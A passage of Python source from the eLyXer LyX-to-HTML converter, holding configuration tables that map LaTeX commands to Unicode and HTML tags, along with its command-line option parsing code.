u'\\sagittarius': u'♐', u'\\saturn': u'♄', u'\\scorpio': u'♏',
u'\\searrow': u'↘', u'\\sec': u'sec', u'\\second': u'″', u'\\setminus': u'∖',
u'\\sharp': u'♯', u'\\simeq': u'≃', u'\\sin': u'sin', u'\\sinh': u'sinh',
u'\\sixteenthnote': u'♬', u'\\skull': u'☠', u'\\slash': u'∕',
u'\\smallsetminus': u'∖', u'\\smalltriangledown': u'▿',
u'\\smalltriangleleft': u'◃', u'\\smalltriangleright': u'▹',
u'\\smalltriangleup': u'▵', u'\\smile': u'⌣', u'\\smiley': u'☺',
u'\\spadesuit': u'♠', u'\\spddot': u'¨', u'\\sphat': u'',
u'\\sphericalangle': u'∢', u'\\spot': u'⦁', u'\\sptilde': u'~',
u'\\sqcap': u'⊓', u'\\sqcup': u'⊔', u'\\sqsubset': u'⊏',
u'\\sqsubseteq': u'⊑', u'\\sqsupset': u'⊐', u'\\sqsupseteq': u'⊒',
u'\\square': u'□', u'\\sslash': u'⫽', u'\\star': u'⋆', u'\\steaming': u'☕',
u'\\subseteqq': u'⫅', u'\\subsetneqq': u'⫋', u'\\succ': u'≻',
u'\\succcurlyeq': u'≽', u'\\succeq': u'≽', u'\\succnsim': u'⋩',
u'\\succsim': u'≿', u'\\sun': u'☼', u'\\sup': u'sup', u'\\supseteqq': u'⫆',
u'\\supsetneqq': u'⫌', u'\\surd': u'√', u'\\swarrow': u'↙',
u'\\swords': u'⚔', u'\\talloblong': u'⫾', u'\\tan': u'tan',
u'\\tanh': u'tanh', u'\\taurus': u'♉', u'\\textasciicircum': u'^',
u'\\textasciitilde': u'~', u'\\textbackslash': u'\\',
u'\\textcopyright': u'©\'', u'\\textdegree': u'°', u'\\textellipsis': u'…',
u'\\textemdash': u'—', u'\\textendash': u'—', u'\\texteuro': u'€',
u'\\textgreater': u'>', u'\\textless': u'<', u'\\textordfeminine': u'ª',
u'\\textordmasculine': u'º', u'\\textquotedblleft': u'“',
u'\\textquotedblright': u'”', u'\\textquoteright': u'’',
u'\\textregistered': u'®', u'\\textrightarrow': u'→',
u'\\textsection': u'§', u'\\texttrademark': u'™',
u'\\texttwosuperior': u'²', u'\\textvisiblespace': u' ',
u'\\therefore': u'∴', u'\\third': u'‴', u'\\top': u'⊤', u'\\triangle': u'△',
u'\\triangleleft': u'⊲', u'\\trianglelefteq': u'⊴', u'\\triangleq': u'≜',
u'\\triangleright': u'▷', u'\\trianglerighteq': u'⊵',
u'\\twoheadleftarrow': u'↞', u'\\twoheadrightarrow': u'↠',
u'\\twonotes': u'♫', u'\\udot': u'⊍', u'\\ulcorner': u'⌜', u'\\unlhd': u'⊴',
u'\\unrhd': u'⊵', u'\\unrhl': u'⊵', u'\\uparrow': u'↑',
u'\\updownarrow': u'↕', u'\\upharpoonleft': u'↿', u'\\upharpoonright': u'↾',
u'\\uplus': u'⊎', u'\\upuparrows': u'⇈', u'\\uranus': u'♅',
u'\\urcorner': u'⌝', u'\\vDash': u'⊨', u'\\varclubsuit': u'♧',
u'\\vardiamondsuit': u'♦', u'\\varheartsuit': u'♥', u'\\varnothing': u'∅',
u'\\varspadesuit': u'♤', u'\\vdash': u'⊢', u'\\vdots': u'⋮', u'\\vee': u'∨',
u'\\vee)': u'∨', u'\\veebar': u'⊻', u'\\vert': u'∣', u'\\virgo': u'♍',
u'\\warning': u'⚠', u'\\wasylozenge': u'⌑', u'\\wedge': u'∧',
u'\\wedge)': u'∧', u'\\wp': u'℘', u'\\wr': u'≀', u'\\yen': u'¥',
u'\\yinyang': u'☯', u'\\{': u'{', u'\\|': u'∥', u'\\}': u'}',
}
decoratedcommand = {
}
decoratingfunctions = {
u'\\overleftarrow': u'⟵', u'\\overrightarrow': u'⟶', u'\\widehat': u'^',
}
endings = {
u'bracket': u'}', u'complex': u'\\]', u'endafter': u'}',
u'endbefore': u'\\end{', u'squarebracket': u']',
}
environments = {
u'align': [u'r', u'l',], u'eqnarray': [u'r', u'c', u'l',],
u'gathered': [u'l', u'l',],
}
fontfunctions = {
u'\\boldsymbol': u'b', u'\\mathbb': u'span class="blackboard"',
u'\\mathbb{A}': u'𝔸', u'\\mathbb{B}': u'𝔹', u'\\mathbb{C}': u'ℂ',
u'\\mathbb{D}': u'𝔻', u'\\mathbb{E}': u'𝔼', u'\\mathbb{F}': u'𝔽',
u'\\mathbb{G}': u'𝔾', u'\\mathbb{H}': u'ℍ', u'\\mathbb{J}': u'𝕁',
u'\\mathbb{K}': u'𝕂', u'\\mathbb{L}': u'𝕃', u'\\mathbb{N}': u'ℕ',
u'\\mathbb{O}': u'𝕆', u'\\mathbb{P}': u'ℙ', u'\\mathbb{Q}': u'ℚ',
u'\\mathbb{R}': u'ℝ', u'\\mathbb{S}': u'𝕊', u'\\mathbb{T}': u'𝕋',
u'\\mathbb{W}': u'𝕎', u'\\mathbb{Z}': u'ℤ', u'\\mathbf': u'b',
u'\\mathcal': u'span class="scriptfont"', u'\\mathcal{B}': u'ℬ',
u'\\mathcal{E}': u'ℰ', u'\\mathcal{F}': u'ℱ', u'\\mathcal{H}': u'ℋ',
u'\\mathcal{I}': u'ℐ', u'\\mathcal{L}': u'ℒ', u'\\mathcal{M}': u'ℳ',
u'\\mathcal{R}': u'ℛ', u'\\mathfrak': u'span class="fraktur"',
u'\\mathfrak{C}': u'ℭ', u'\\mathfrak{F}': u'𝔉', u'\\mathfrak{H}': u'ℌ',
u'\\mathfrak{I}': u'ℑ', u'\\mathfrak{R}': u'ℜ', u'\\mathfrak{Z}': u'ℨ',
u'\\mathit': u'i', u'\\mathring{A}': u'Å', u'\\mathring{U}': u'Ů',
u'\\mathring{a}': u'å', u'\\mathring{u}': u'ů', u'\\mathring{w}': u'ẘ',
u'\\mathring{y}': u'ẙ', u'\\mathrm': u'span class="mathrm"',
u'\\mathscr': u'span class="scriptfont"', u'\\mathscr{B}': u'ℬ',
u'\\mathscr{E}': u'ℰ', u'\\mathscr{F}': u'ℱ', u'\\mathscr{H}': u'ℋ',
u'\\mathscr{I}': u'ℐ', u'\\mathscr{L}': u'ℒ', u'\\mathscr{M}': u'ℳ',
u'\\mathscr{R}': u'ℛ', u'\\mathsf': u'span class="mathsf"',
u'\\mathtt': u'tt',
}
hybridfunctions = {
u'\\addcontentsline': [u'{$p!}{$q!}{$r!}', u'f0{}', u'ignored',],
u'\\addtocontents': [u'{$p!}{$q!}', u'f0{}', u'ignored',],
u'\\backmatter': [u'', u'f0{}', u'ignored',],
u'\\binom': [u'{$1}{$2}', u'f2{(}f0{f1{$1}f1{$2}}f2{)}', u'span class="binom"', u'span class="binomstack"', u'span class="bigsymbol"',],
u'\\boxed': [u'{$1}', u'f0{$1}', u'span class="boxed"',],
u'\\cfrac': [u'[$p!]{$1}{$2}', u'f0{f3{(}f1{$1}f3{)/(}f2{$2}f3{)}}', u'span class="fullfraction"', u'span class="numerator align-$p"', u'span class="denominator"', u'span class="ignored"',],
u'\\color': [u'{$p!}{$1}', u'f0{$1}', u'span style="color: $p;"',],
u'\\colorbox': [u'{$p!}{$1}', u'f0{$1}', u'span class="colorbox" style="background: $p;"',],
u'\\dbinom': [u'{$1}{$2}', u'(f0{f1{f2{$1}}f1{f2{ }}f1{f2{$2}}})', u'span class="binomial"', u'span class="binomrow"', u'span class="binomcell"',],
u'\\dfrac': [u'{$1}{$2}', u'f0{f3{(}f1{$1}f3{)/(}f2{$2}f3{)}}', u'span class="fullfraction"', u'span class="numerator"', u'span class="denominator"', u'span class="ignored"',],
u'\\displaystyle': [u'{$1}', u'f0{$1}', u'span class="displaystyle"',],
u'\\fancyfoot': [u'[$p!]{$q!}', u'f0{}', u'ignored',],
u'\\fancyhead': [u'[$p!]{$q!}', u'f0{}', u'ignored',],
u'\\fbox': [u'{$1}', u'f0{$1}', u'span class="fbox"',],
u'\\fboxrule': [u'{$p!}', u'f0{}', u'ignored',],
u'\\fboxsep': [u'{$p!}', u'f0{}', u'ignored',],
u'\\fcolorbox': [u'{$p!}{$q!}{$1}', u'f0{$1}', u'span class="boxed" style="border-color: $p; background: $q;"',],
u'\\frac': [u'{$1}{$2}', u'f0{f3{(}f1{$1}f3{)/(}f2{$2}f3{)}}', u'span class="fraction"', u'span class="numerator"', u'span class="denominator"', u'span class="ignored"',],
u'\\framebox': [u'[$p!][$q!]{$1}', u'f0{$1}', u'span class="framebox align-$q" style="width: $p;"',],
u'\\frontmatter': [u'', u'f0{}', u'ignored',],
u'\\href': [u'[$o]{$u!}{$t!}', u'f0{$t}', u'a href="$u"',],
u'\\hspace': [u'{$p!}', u'f0{ }', u'span class="hspace" style="width: $p;"',],
u'\\leftroot': [u'{$p!}', u'f0{ }', u'span class="leftroot" style="width: $p;px"',],
u'\\mainmatter': [u'', u'f0{}', u'ignored',],
u'\\markboth': [u'{$p!}{$q!}', u'f0{}', u'ignored',],
u'\\markright': [u'{$p!}', u'f0{}', u'ignored',],
u'\\nicefrac': [u'{$1}{$2}', u'f0{f1{$1}⁄f2{$2}}', u'span class="fraction"', u'sup class="numerator"', u'sub class="denominator"', u'span class="ignored"',],
u'\\parbox': [u'[$p!]{$w!}{$1}', u'f0{1}', u'div class="Boxed" style="width: $w;"',],
u'\\raisebox': [u'{$p!}{$1}', u'f0{$1.font}', u'span class="raisebox" style="vertical-align: $p;"',],
u'\\renewenvironment': [u'{$1!}{$2!}{$3!}', u'',],
u'\\rule': [u'[$v!]{$w!}{$h!}', u'f0/', u'hr class="line" style="width: $w; height: $h;"',],
u'\\scriptscriptstyle': [u'{$1}', u'f0{$1}', u'span class="scriptscriptstyle"',],
u'\\scriptstyle': [u'{$1}', u'f0{$1}', u'span class="scriptstyle"',],
u'\\sqrt': [u'[$0]{$1}', u'f0{f1{$0}f2{√}f4{(}f3{$1}f4{)}}', u'span class="sqrt"', u'sup class="root"', u'span class="radical"', u'span class="root"', u'span class="ignored"',],
u'\\stackrel': [u'{$1}{$2}', u'f0{f1{$1}f2{$2}}', u'span class="stackrel"', u'span class="upstackrel"', u'span class="downstackrel"',],
u'\\tbinom': [u'{$1}{$2}', u'(f0{f1{f2{$1}}f1{f2{ }}f1{f2{$2}}})', u'span class="binomial"', u'span class="binomrow"', u'span class="binomcell"',],
u'\\textcolor': [u'{$p!}{$1}', u'f0{$1}', u'span style="color: $p;"',],
u'\\textstyle': [u'{$1}', u'f0{$1}', u'span class="textstyle"',],
u'\\thispagestyle': [u'{$p!}', u'f0{}', u'ignored',],
u'\\unit': [u'[$0]{$1}', u'$0f0{$1.font}', u'span class="unit"',],
u'\\unitfrac': [u'[$0]{$1}{$2}', u'$0f0{f1{$1.font}⁄f2{$2.font}}', u'span class="fraction"', u'sup class="unit"', u'sub class="unit"',],
u'\\uproot': [u'{$p!}', u'f0{ }', u'span class="uproot" style="width: $p;px"',],
u'\\url': [u'{$u!}', u'f0{$u}', u'a href="$u"',],
u'\\vspace': [u'{$p!}', u'f0{ }', u'span class="vspace" style="height: $p;"',],
}
hybridsizes = {
u'\\binom': u'$1+$2', u'\\cfrac': u'$1+$2', u'\\dbinom': u'$1+$2+1',
u'\\dfrac': u'$1+$2', u'\\frac': u'$1+$2', u'\\tbinom': u'$1+$2+1',
}
labelfunctions = {
u'\\label': u'a name="#"',
}
limitcommands = {
u'\\biginterleave': u'⫼', u'\\bigsqcap': u'⨅', u'\\fint': u'⨏',
u'\\iiiint': u'⨌', u'\\int': u'∫', u'\\intop': u'∫', u'\\lim': u'lim',
u'\\prod': u'∏', u'\\smallint': u'∫', u'\\sqint': u'⨖', u'\\sum': u'∑',
u'\\varointclockwise': u'∲', u'\\varprod': u'⨉', u'\\zcmp': u'⨟',
u'\\zhide': u'⧹', u'\\zpipe': u'⨠', u'\\zproject': u'⨡',
}
misccommands = {
u'\\limits': u'LimitPreviousCommand', u'\\newcommand': u'MacroDefinition',
u'\\renewcommand': u'MacroDefinition',
u'\\setcounter': u'SetCounterFunction', u'\\tag': u'FormulaTag',
u'\\tag*': u'FormulaTag', u'\\today': u'TodayCommand',
}
modified = {
u'\n': u'', u' ': u'', u'$': u'', u'&': u' ', u'\'': u'’', u'+': u' + ',
u',': u', ', u'-': u' − ', u'/': u' ⁄ ', u':': u' : ', u'<': u' < ',
u'=': u' = ', u'>': u' > ', u'@': u'', u'~': u'',
}
onefunctions = {
u'\\Big': u'span class="bigsymbol"', u'\\Bigg': u'span class="hugesymbol"',
u'\\bar': u'span class="bar"', u'\\begin{array}': u'span class="arraydef"',
u'\\big': u'span class="symbol"', u'\\bigg': u'span class="largesymbol"',
u'\\bigl': u'span class="bigsymbol"', u'\\bigr': u'span class="bigsymbol"',
u'\\centering': u'span class="align-center"',
u'\\ensuremath': u'span class="ensuremath"',
u'\\hphantom': u'span class="phantom"',
u'\\noindent': u'span class="noindent"',
u'\\overbrace': u'span class="overbrace"',
u'\\overline': u'span class="overline"',
u'\\phantom': u'span class="phantom"',
u'\\underbrace': u'span class="underbrace"', u'\\underline': u'u',
u'\\vphantom': u'span class="phantom"',
}
spacedcommands = {
u'\\Bot': u'⫫', u'\\Doteq': u'≑', u'\\DownArrowBar': u'⤓',
u'\\DownLeftTeeVector': u'⥞', u'\\DownLeftVectorBar': u'⥖',
u'\\DownRightTeeVector': u'⥟', u'\\DownRightVectorBar': u'⥗',
u'\\Equal': u'⩵', u'\\LeftArrowBar': u'⇤', u'\\LeftDownTeeVector': u'⥡',
u'\\LeftDownVectorBar': u'⥙', u'\\LeftTeeVector': u'⥚',
u'\\LeftTriangleBar': u'⧏', u'\\LeftUpTeeVector': u'⥠',
u'\\LeftUpVectorBar': u'⥘', u'\\LeftVectorBar': u'⥒',
u'\\Leftrightarrow': u'⇔', u'\\Longmapsfrom': u'⟽', u'\\Longmapsto': u'⟾',
u'\\MapsDown': u'↧', u'\\MapsUp': u'↥', u'\\Nearrow': u'⇗',
u'\\NestedGreaterGreater': u'⪢', u'\\NestedLessLess': u'⪡',
u'\\NotGreaterLess': u'≹', u'\\NotGreaterTilde': u'≵',
u'\\NotLessTilde': u'≴', u'\\Nwarrow': u'⇖', u'\\Proportion': u'∷',
u'\\RightArrowBar': u'⇥', u'\\RightDownTeeVector': u'⥝',
u'\\RightDownVectorBar': u'⥕', u'\\RightTeeVector': u'⥛',
u'\\RightTriangleBar': u'⧐', u'\\RightUpTeeVector': u'⥜',
u'\\RightUpVectorBar': u'⥔', u'\\RightVectorBar': u'⥓',
u'\\Rightarrow': u'⇒', u'\\Same': u'⩶', u'\\Searrow': u'⇘',
u'\\Swarrow': u'⇙', u'\\Top': u'⫪', u'\\UpArrowBar': u'⤒', u'\\VDash': u'⊫',
u'\\approx': u'≈', u'\\approxeq': u'≊', u'\\backsim': u'∽', u'\\barin': u'⋶',
u'\\barleftharpoon': u'⥫', u'\\barrightharpoon': u'⥭', u'\\bij': u'⤖',
u'\\coloneq': u'≔', u'\\corresponds': u'≙', u'\\curlyeqprec': u'⋞',
u'\\curlyeqsucc': u'⋟', u'\\dashrightarrow': u'⇢', u'\\dlsh': u'↲',
u'\\downdownharpoons': u'⥥', u'\\downuparrows': u'⇵',
u'\\downupharpoons': u'⥯', u'\\drsh': u'↳', u'\\eqslantgtr': u'⪖',
u'\\eqslantless': u'⪕', u'\\equiv': u'≡', u'\\ffun': u'⇻', u'\\finj': u'⤕',
u'\\ge': u'≥', u'\\geq': u'≥', u'\\ggcurly': u'⪼', u'\\gnapprox': u'⪊',
u'\\gneq': u'⪈', u'\\gtrapprox': u'⪆', u'\\hash': u'⋕', u'\\iddots': u'⋰',
u'\\implies': u' ⇒ ', u'\\in': u'∈', u'\\le': u'≤', u'\\leftarrow': u'←',
u'\\leftarrowtriangle': u'⇽', u'\\leftbarharpoon': u'⥪',
u'\\leftrightarrowtriangle': u'⇿', u'\\leftrightharpoon': u'⥊',
u'\\leftrightharpoondown': u'⥐', u'\\leftrightharpoonup': u'⥎',
u'\\leftrightsquigarrow': u'↭', u'\\leftslice': u'⪦',
u'\\leftsquigarrow': u'⇜', u'\\leftupdownharpoon': u'⥑', u'\\leq': u'≤',
u'\\lessapprox': u'⪅', u'\\llcurly': u'⪻', u'\\lnapprox': u'⪉',
u'\\lneq': u'⪇', u'\\longmapsfrom': u'⟻', u'\\multimapboth': u'⧟',
u'\\multimapdotbothA': u'⊶', u'\\multimapdotbothB': u'⊷',
u'\\multimapinv': u'⟜', u'\\nVdash': u'⊮', u'\\ne': u'≠', u'\\neq': u'≠',
u'\\ngeq': u'≱', u'\\nleq': u'≰', u'\\nni': u'∌', u'\\not\\in': u'∉',
u'\\notasymp': u'≭', u'\\npreceq': u'⋠', u'\\nsqsubseteq': u'⋢',
u'\\nsqsupseteq': u'⋣', u'\\nsubset': u'⊄', u'\\nsucceq': u'⋡',
u'\\pfun': u'⇸', u'\\pinj': u'⤔', u'\\precapprox': u'⪷', u'\\preceqq': u'⪳',
u'\\precnapprox': u'⪹', u'\\precnsim': u'⋨', u'\\propto': u'∝',
u'\\psur': u'⤀', u'\\rightarrow': u'→', u'\\rightarrowtriangle': u'⇾',
u'\\rightbarharpoon': u'⥬', u'\\rightleftharpoon': u'⥋',
u'\\rightslice': u'⪧', u'\\rightsquigarrow': u'⇝',
u'\\rightupdownharpoon': u'⥏', u'\\sim': u'~', u'\\strictfi': u'⥼',
u'\\strictif': u'⥽', u'\\subset': u'⊂', u'\\subseteq': u'⊆',
u'\\subsetneq': u'⊊', u'\\succapprox': u'⪸', u'\\succeqq': u'⪴',
u'\\succnapprox': u'⪺', u'\\supset': u'⊃', u'\\supseteq': u'⊇',
u'\\supsetneq': u'⊋', u'\\times': u'×', u'\\to': u'→',
u'\\updownarrows': u'⇅', u'\\updownharpoons': u'⥮', u'\\upupharpoons': u'⥣',
u'\\vartriangleleft': u'⊲', u'\\vartriangleright': u'⊳',
}
starts = {
u'beginafter': u'}', u'beginbefore': u'\\begin{', u'bracket': u'{',
u'command': u'\\', u'comment': u'%', u'complex': u'\\[', u'simple': u'$',
u'squarebracket': u'[', u'unnumbered': u'*',
}
symbolfunctions = {
u'^': u'sup', u'_': u'sub',
}
textfunctions = {
u'\\mbox': u'span class="mbox"', u'\\text': u'span class="text"',
u'\\textbf': u'b', u'\\textipa': u'span class="textipa"', u'\\textit': u'i',
u'\\textnormal': u'span class="textnormal"',
u'\\textrm': u'span class="textrm"',
u'\\textsc': u'span class="versalitas"',
u'\\textsf': u'span class="textsf"', u'\\textsl': u'i', u'\\texttt': u'tt',
u'\\textup': u'span class="normal"',
}
unmodified = {
u'characters': [u'.', u'*', u'€', u'(', u')', u'[', u']', u'·', u'!', u';', u'|', u'§', u'"',],
}
urls = {
u'googlecharts': u'http://chart.googleapis.com/chart?cht=tx&chl=',
}
class GeneralConfig(object):
"Configuration class from elyxer.config file"
version = {
u'date': u'2015-02-26', u'lyxformat': u'413', u'number': u'1.2.5',
}
class HeaderConfig(object):
"Configuration class from elyxer.config file"
parameters = {
u'beginpreamble': u'\\begin_preamble', u'branch': u'\\branch',
u'documentclass': u'\\textclass', u'endbranch': u'\\end_branch',
u'endpreamble': u'\\end_preamble', u'language': u'\\language',
u'lstset': u'\\lstset', u'outputchanges': u'\\output_changes',
u'paragraphseparation': u'\\paragraph_separation',
u'pdftitle': u'\\pdf_title', u'secnumdepth': u'\\secnumdepth',
u'tocdepth': u'\\tocdepth',
}
styles = {
u'article': [u'article', u'aastex', u'aapaper', u'acmsiggraph', u'sigplanconf', u'achemso', u'amsart', u'apa', u'arab-article', u'armenian-article', u'article-beamer', u'chess', u'dtk', u'elsarticle', u'heb-article', u'IEEEtran', u'iopart', u'kluwer', u'scrarticle-beamer', u'scrartcl', u'extarticle', u'paper', u'mwart', u'revtex4', u'spie', u'svglobal3', u'ltugboat', u'agu-dtd', u'jgrga', u'agums', u'entcs', u'egs', u'ijmpc', u'ijmpd', u'singlecol-new', u'doublecol-new', u'isprs', u'tarticle', u'jsarticle', u'jarticle', u'jss', u'literate-article', u'siamltex', u'cl2emult', u'llncs', u'svglobal', u'svjog', u'svprobth',],
u'book': [u'book', u'amsbook', u'scrbook', u'extbook', u'tufte-book', u'report', u'extreport', u'scrreprt', u'memoir', u'tbook', u'jsbook', u'jbook', u'mwbk', u'svmono', u'svmult', u'treport', u'jreport', u'mwrep',],
}
class ImageConfig(object):
"Configuration class from elyxer.config file"
converters = {
u'imagemagick': u'convert[ -density $scale][ -define $format:use-cropbox=true] "$input" "$output"',
u'inkscape': u'inkscape "$input" --export-png="$output"',
u'lyx': u'lyx -C "$input" "$output"',
}
cropboxformats = {
u'.eps': u'ps', u'.pdf': u'pdf', u'.ps': u'ps',
}
formats = {
u'default': u'.png', u'vector': [u'.svg', u'.eps',],
}
class LayoutConfig(object):
"Configuration class from elyxer.config file"
groupable = {
u'allowed': [u'StringContainer', u'Constant', u'TaggedText', u'Align', u'TextFamily', u'EmphaticText', u'VersalitasText', u'BarredText', u'SizeText', u'ColorText', u'LangLine', u'Formula',],
}
class NewfangleConfig(object):
"Configuration class from elyxer.config file"
constants = {
u'chunkref': u'chunkref{', u'endcommand': u'}', u'endmark': u'>',
u'startcommand': u'\\', u'startmark': u'=<',
}
class NumberingConfig(object):
"Configuration class from elyxer.config file"
layouts = {
u'ordered': [u'Chapter', u'Section', u'Subsection', u'Subsubsection', u'Paragraph',],
u'roman': [u'Part', u'Book',],
}
sequence = {
u'symbols': [u'*', u'**', u'†', u'‡', u'§', u'§§', u'¶', u'¶¶', u'#', u'##',],
}
class StyleConfig(object):
"Configuration class from elyxer.config file"
hspaces = {
u'\\enskip{}': u' ', u'\\hfill{}': u'<span class="hfill"> </span>',
u'\\hspace*{\\fill}': u' ', u'\\hspace*{}': u'', u'\\hspace{}': u' ',
u'\\negthinspace{}': u'', u'\\qquad{}': u' ', u'\\quad{}': u' ',
u'\\space{}': u' ', u'\\thinspace{}': u' ', u'~': u' ',
}
quotes = {
u'ald': u'»', u'als': u'›', u'ard': u'«', u'ars': u'‹', u'eld': u'“',
u'els': u'‘', u'erd': u'”', u'ers': u'’', u'fld': u'«',
u'fls': u'‹', u'frd': u'»', u'frs': u'›', u'gld': u'„', u'gls': u'‚',
u'grd': u'“', u'grs': u'‘', u'pld': u'„', u'pls': u'‚', u'prd': u'”',
u'prs': u'’', u'sld': u'”', u'srd': u'”',
}
referenceformats = {
u'eqref': u'(@↕)', u'formatted': u'¶↕', u'nameref': u'$↕', u'pageref': u'#↕',
u'ref': u'@↕', u'vpageref': u'on-page#↕', u'vref': u'@on-page#↕',
}
size = {
u'ignoredtexts': [u'col', u'text', u'line', u'page', u'theight', u'pheight',],
}
vspaces = {
u'bigskip': u'<div class="bigskip"> </div>',
u'defskip': u'<div class="defskip"> </div>',
u'medskip': u'<div class="medskip"> </div>',
u'smallskip': u'<div class="smallskip"> </div>',
u'vfill': u'<div class="vfill"> </div>',
}
class TOCConfig(object):
"Configuration class from elyxer.config file"
extractplain = {
u'allowed': [u'StringContainer', u'Constant', u'TaggedText', u'Align', u'TextFamily', u'EmphaticText', u'VersalitasText', u'BarredText', u'SizeText', u'ColorText', u'LangLine', u'Formula',],
u'cloned': [u'',], u'extracted': [u'',],
}
extracttitle = {
u'allowed': [u'StringContainer', u'Constant', u'Space',],
u'cloned': [u'TextFamily', u'EmphaticText', u'VersalitasText', u'BarredText', u'SizeText', u'ColorText', u'LangLine', u'Formula',],
u'extracted': [u'PlainLayout', u'TaggedText', u'Align', u'Caption', u'StandardLayout', u'FlexInset',],
}
class TagConfig(object):
"Configuration class from elyxer.config file"
barred = {
u'under': u'u',
}
family = {
u'sans': u'span class="sans"', u'typewriter': u'tt',
}
flex = {
u'CharStyle:Code': u'span class="code"',
u'CharStyle:MenuItem': u'span class="menuitem"',
u'Code': u'span class="code"', u'MenuItem': u'span class="menuitem"',
u'Noun': u'span class="noun"', u'Strong': u'span class="strong"',
}
group = {
u'layouts': [u'Quotation', u'Quote',],
}
layouts = {
u'Center': u'div', u'Chapter': u'h?', u'Date': u'h2', u'Paragraph': u'div',
u'Part': u'h1', u'Quotation': u'blockquote', u'Quote': u'blockquote',
u'Section': u'h?', u'Subsection': u'h?', u'Subsubsection': u'h?',
}
listitems = {
u'Enumerate': u'ol', u'Itemize': u'ul',
}
notes = {
u'Comment': u'', u'Greyedout': u'span class="greyedout"', u'Note': u'',
}
script = {
u'subscript': u'sub', u'superscript': u'sup',
}
shaped = {
u'italic': u'i', u'slanted': u'i', u'smallcaps': u'span class="versalitas"',
}
class TranslationConfig(object):
"Configuration class from elyxer.config file"
constants = {
u'Appendix': u'Appendix', u'Book': u'Book', u'Chapter': u'Chapter',
u'Paragraph': u'Paragraph', u'Part': u'Part', u'Section': u'Section',
u'Subsection': u'Subsection', u'Subsubsection': u'Subsubsection',
u'abstract': u'Abstract', u'bibliography': u'Bibliography',
u'figure': u'figure', u'float-algorithm': u'Algorithm ',
u'float-figure': u'Figure ', u'float-listing': u'Listing ',
u'float-table': u'Table ', u'float-tableau': u'Tableau ',
u'footnotes': u'Footnotes', u'generated-by': u'Document generated by ',
u'generated-on': u' on ', u'index': u'Index',
u'jsmath-enable': u'Please enable JavaScript on your browser.',
u'jsmath-requires': u' requires JavaScript to correctly process the mathematics on this page. ',
u'jsmath-warning': u'Warning: ', u'list-algorithm': u'List of Algorithms',
u'list-figure': u'List of Figures', u'list-table': u'List of Tables',
u'list-tableau': u'List of Tableaux', u'main-page': u'Main page',
u'next': u'Next', u'nomenclature': u'Nomenclature',
u'on-page': u' on page ', u'prev': u'Prev', u'references': u'References',
u'toc': u'Table of Contents', u'toc-for': u'Contents for ', u'up': u'Up',
}
languages = {
u'american': u'en', u'british': u'en', u'deutsch': u'de', u'dutch': u'nl',
u'english': u'en', u'french': u'fr', u'ngerman': u'de', u'russian': u'ru',
u'spanish': u'es',
}
class CommandLineParser(object):
"A parser for runtime options"
def __init__(self, options):
self.options = options
def parseoptions(self, args):
"Parse command line options"
if len(args) == 0:
return None
while len(args) > 0 and args[0].startswith('--'):
key, value = self.readoption(args)
if not key:
return 'Option ' + value + ' not recognized'
if not value:
return 'Option ' + key + ' needs a value'
setattr(self.options, key, value)
return None
def readoption(self, args):
"Read the key and value for an option"
arg = args[0][2:]
del args[0]
if '=' in arg:
key = self.readequalskey(arg, args)
else:
key = arg.replace('-', '')
if not hasattr(self.options, key):
return None, key
current = getattr(self.options, key)
if isinstance(current, bool):
return key, True
# read value
if len(args) == 0:
return key, None
if args[0].startswith('"'):
initial = args[0]
del args[0]
return key, self.readquoted(args, initial)
value = args[0].decode('utf-8')
del args[0]
if isinstance(current, list):
current.append(value)
return key, current
return key, value
def readquoted(self, args, initial):
"Read a value between quotes"
Trace.error('Oops')
value = initial[1:]
while len(args) > 0 and not args[0].endswith('"') and not args[0].startswith('--'):
Trace.error('Appending ' + args[0])
value += ' ' + args[0]
del args[0]
if len(args) == 0 or args[0].startswith('--'):
return None
value += ' ' + args[0:-1]
return value
def readequalskey(self, arg, args):
"Read a key using equals"
split = arg.split('=', 1)
key = split[0]
value = split[1]
args.insert(0, value)
return key
class Options(object):
"A set of runtime options"
instance = None
location = None
nocopy = False
copyright = False
debug = False
quiet = False
version = False
hardversion = False
versiondate = False
html = False
help = False
showlines = True
unicode = False
iso885915 = False
css = []
favicon = ''
title = None
directory = None
destdirectory = None
toc = False
toctarget = ''
tocfor = None
forceformat = None
lyxformat = False
target = None
splitpart = None
memory = True
lowmem = False
nobib = False
converter = 'imagemagick'
raw = False
jsmath = None
mathjax = None
nofooter = False
simplemath = False
template = None
noconvert = False
notoclabels = False
letterfoot = True
numberfoot = False
symbolfoot = False
hoverfoot = True
marginfoot = False
endfoot = False
supfoot = True
alignfoot = False
footnotes = None
imageformat = None
copyimages = False
googlecharts = False
embedcss = []
branches = dict()
def parseoptions(self, args):
"Parse command line options"
Options.location = args[0]
del args[0]
parser = CommandLineParser(Options)
result = parser.parseoptions(args)
if result:
Trace.error(result)
self.usage()
self.processoptions()
def processoptions(self):
"Process all options parsed."
if Options.help:
self.usage()
if Options.version:
self.showversion()
if Options.hardversion:
self.showhardversion()
if Options.versiondate:
self.showversiondate()
if Options.lyxformat:
self.showlyxformat()
if Options.splitpart:
try:
Options.splitpart = int(Options.splitpart)
if Options.splitpart <= 0:
Trace.error('--splitpart requires a number bigger than zero')
self.usage()
except:
Trace.error('--splitpart needs a numeric argument, not ' + Options.splitpart)
self.usage()
if Options.lowmem or Options.toc or Options.tocfor:
Options.memory = False
self.parsefootnotes()
if Options.forceformat and not Options.imageformat:
Options.imageformat = Options.forceformat
if Options.imageformat == 'copy':
Options.copyimages = True
if Options.css == []:
Options.css = ['http://elyxer.nongnu.org/lyx.css']
if Options.favicon == '':
pass # no default favicon
if Options.html:
Options.simplemath = True
if Options.toc and not Options.tocfor:
Trace.error('Option --toc is deprecated; use --tocfor "page" instead')
Options.tocfor = Options.toctarget
if Options.nocopy:
Trace.error('Option --nocopy is deprecated; it is no longer needed')
if Options.jsmath:
Trace.error('Option --jsmath is deprecated; use --mathjax instead')
# set in Trace if necessary
for param in dir(Trace):
if param.endswith('mode'):
setattr(Trace, param, getattr(self, param[:-4]))
def usage(self):
"Show correct usage"
Trace.error('Usage: ' + os.path.basename(Options.location) + ' [options] [filein] [fileout]')
Trace.error('Convert LyX input file "filein" to HTML file "fileout".')
Trace.error('If filein (or fileout) is not given use standard input (or output).')
Trace.error('Main program of the eLyXer package (http://elyxer.nongnu.org/).')
self.showoptions()
def parsefootnotes(self):
"Parse footnotes options."
if not Options.footnotes:
return
Options.marginfoot = False
Options.letterfoot = False
Options.hoverfoot = False
options = Options.footnotes.split(',')
for option in options:
footoption = option + 'foot'
if hasattr(Options, footoption):
setattr(Options, footoption, True)
else:
Trace.error('Unknown footnotes option: ' + option)
